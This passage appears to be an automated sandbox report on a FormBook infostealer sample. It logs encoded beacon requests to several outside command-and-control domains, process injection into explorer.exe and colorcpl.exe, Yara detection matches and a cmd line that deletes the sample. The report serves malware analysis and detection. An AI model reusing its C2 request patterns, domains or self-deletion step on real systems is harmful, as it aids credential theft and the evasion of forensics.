                                                          Mar 29, 2021 13:59:48.360106945 CEST | 4921 | OUT | GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.choupisson.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:48.489104986 CEST | 4922 | IN | HTTP/1.1 302 Found
                                                          Date: Mon, 29 Mar 2021 11:59:48 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 313
                                                          Connection: close
                                                          Server: Apache/2
                                                          Location: https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp
                                                          Cache-Control: max-age=3600
                                                          Expires: Mon, 29 Mar 2021 12:59:48 GMT
                                                          Accept-Ranges: bytes
                                                          Age: 0
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 68 6f 75 70 69 73 73 6f 6e 2e 63 6f 6d 2f 63 38 62 73 2f 3f 6f 58 3d 56 41 2b 52 68 65 55 68 6e 48 36 49 5a 62 6d 2b 55 38 59 32 6d 7a 43 6e 57 63 30 39 62 33 4a 48 69 47 46 56 36 6e 73 42 68 42 49 61 44 76 31 54 47 44 42 44 4f 47 68 49 54 75 65 41 66 46 66 76 2b 46 32 4f 26 61 6d 70 3b 73 50 6a 30 71 74 3d 45 7a 75 44 5f 6e 4e 50 61 34 77 6c 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&amp;sPj0qt=EzuD_nNPa4wlp">here</a>.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          7 | 192.168.2.3 | 49742 | 23.227.38.32 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:59:53.620903015 CEST | 4923 | OUT | GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.uforservice.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:53.792627096 CEST | 4924 | IN | HTTP/1.1 403 Forbidden
                                                          Date: Mon, 29 Mar 2021 11:59:53 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Sorting-Hat-PodId: 159
                                                          X-Sorting-Hat-ShopId: 46980300960
                                                          X-Dc: gcp-us-central1
                                                          X-Request-ID: 3034cefa-2765-4a18-84be-5fd56af09bd9
                                                          Set-Cookie: _shopify_fs=2021-03-29T11%3A59%3A53Z; Expires=Tue, 29-Mar-22 11:59:53 GMT; Domain=uforservice.com; Path=/; SameSite=Lax
                                                          X-Download-Options: noopen
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          CF-Cache-Status: DYNAMIC
                                                          cf-request-id: 091f73e1350000c2bdc20e0000000001
                                                          Server: cloudflare
                                                          CF-RAY: 6378ef485d13c2bd-FRA
                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74
                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          8 | 192.168.2.3 | 49743 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 14:00:09.173280001 CEST | 4931 | OUT | GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.silverdollarcafe.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 14:00:09.372026920 CEST | 4931 | IN | HTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 29 Mar 2021 12:00:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "605e0bcb-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          HTTPS Packets

                                                          Timestamp | Source IP | Source Port | Dest IP | Dest Port
                                                          Mar 29, 2021 13:58:29.576385975 CEST | 170.249.199.106 | 443 | 192.168.2.3 | 49714
                                                          Certificate chain (Subject | Issuer | Not Before | Not After):
                                                          CN=aps-mm.com | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Tue Mar 16 01:00:00 CET 2021 | Tue Jun 15 01:59:59 CEST 2021
                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029
                                                          JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
                                                          JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          System Behavior

                                                          General

                                                          Start time: 13:57:57
                                                          Start date: 29/03/2021
                                                          Path: C:\Users\user\Desktop\Payment_png.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase: 0x400000
                                                          File size: 98304 bytes
                                                          MD5 hash: 86FA26E33879D3C04152301EAAABA518
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: Visual Basic
                                                          Reputation: low

                                                          General

                                                          Start time: 13:58:18
                                                          Start date: 29/03/2021
                                                          Path: C:\Users\user\Desktop\Payment_png.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase: 0x400000
                                                          File size: 98304 bytes
                                                          MD5 hash: 86FA26E33879D3C04152301EAAABA518
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation: low

                                                          General

                                                          Start time: 13:58:32
                                                          Start date: 29/03/2021
                                                          Path: C:\Windows\explorer.exe
                                                          Wow64 process (32bit): false
                                                          Commandline:
                                                          Imagebase: 0x7ff714890000
                                                          File size: 3933184 bytes
                                                          MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Reputation: high

                                                          General

                                                          Start time: 13:58:43
                                                          Start date: 29/03/2021
                                                          Path: C:\Windows\SysWOW64\colorcpl.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: C:\Windows\SysWOW64\colorcpl.exe
                                                          Imagebase: 0xe70000
                                                          File size: 86528 bytes
                                                          MD5 hash: 746F3B5E7652EA0766BA10414D317981
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation: moderate

                                                          General

                                                          Start time: 13:58:50
                                                          Start date: 29/03/2021
                                                          Path: C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: /c del 'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase: 0xf20000
                                                          File size: 232960 bytes
                                                          MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Reputation: high

                                                          General

                                                          Start time: 13:58:50
                                                          Start date: 29/03/2021
                                                          Path: C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit): false
                                                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase: 0x7ff6b2800000
                                                          File size: 625664 bytes
                                                          MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Reputation: high

                                                          Disassembly

                                                          Code Analysis